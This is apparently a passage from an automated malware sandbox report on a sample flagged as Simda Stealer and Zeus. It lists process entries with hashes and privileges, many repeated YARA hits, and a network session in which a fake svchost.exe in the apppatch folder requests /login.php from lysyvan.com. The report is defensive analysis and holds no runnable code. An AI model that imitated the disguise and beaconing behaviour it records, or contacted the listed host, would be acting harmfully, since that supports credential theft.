                                                                                                                                                                                                          Data Ascii: portant;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!important


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 53554 | 188.114.96.3 | 443 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:26:02 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-11-11 17:26:03 UTC | 1082 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:03 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="38.6",amp_style_sanitizer;dur="18.9",amp_tag_and_attribute_sanitizer;dur="14.8",amp_optimizer;dur="20.4"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pdnshuhj2FQouaovKGIqb4cBOZWU16Wjj7TZogvepW5jq5ObdluKzqGVVY0y96sEdnyZh1AbDDgrYHKCafSuaIxkgE2vE7HDmHTW6pof9CkeJOYj59nHvS1gdaLDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc27e9010c96-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=2a9a016731b5290c&ts=1456&x=0"



Target ID: 0
Start time: 12:24:00
Start date: 11/11/2024
Path: C:\Users\user\Desktop\WlCVLbzNph.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\WlCVLbzNph.exe"
Imagebase: 0x400000
File size: 210'432 bytes
MD5 hash: BB4D08026F4DAD460862BE3D65FBEDDB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 2
Start time: 12:24:01
Start date: 11/11/2024
Path: C:\Windows\apppatch\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\apppatch\svchost.exe"
Imagebase: 0x400000
File size: 210'432 bytes
MD5 hash: 7F7F85F214F3A6B27A5B5FF8F6EC6188
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1991774796.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1985170745.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1980433347.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1985005669.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1964558264.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2692265840.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1869468125.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1995640935.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1948235173.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1964024407.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1980207397.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1963250031.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1992856341.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1815491557.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1994050836.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1458207873.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1907200563.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1984832465.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1810656396.0000000004200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2000637798.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1991348286.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1823534171.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1882456143.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1962925986.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1995104325.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1963615191.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1899640794.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2011646276.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1992107371.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1980820181.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1964296820.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2000260170.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1963816092.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1953762470.000000000ED00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1984425254.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1930720915.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1962281793.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2691342691.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1960879139.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2017537084.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1984646788.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1992581990.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1873423952.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1841520196.000000000F340000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1994473881.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1964748612.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1455296736.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1455296736.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1981345088.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2017774117.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                          Start time:12:24:37
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1935549687.0000000001200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1937317769.0000000001410000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                          Start time:12:24:38
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1936970508.0000000001320000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1937351360.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                          Start time:12:24:38
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 764
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                          Start time:12:24:38
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000A.00000002.1940866370.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000A.00000002.1943305461.0000000003210000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                          Start time:12:24:39
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 716
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                          Start time:12:24:39
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1947004651.0000000003160000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1943298176.0000000002F60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                          Start time:12:24:41
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000F.00000002.1873568549.0000000002B50000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000F.00000002.1874297883.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                          Start time:12:24:41
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 732
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:18
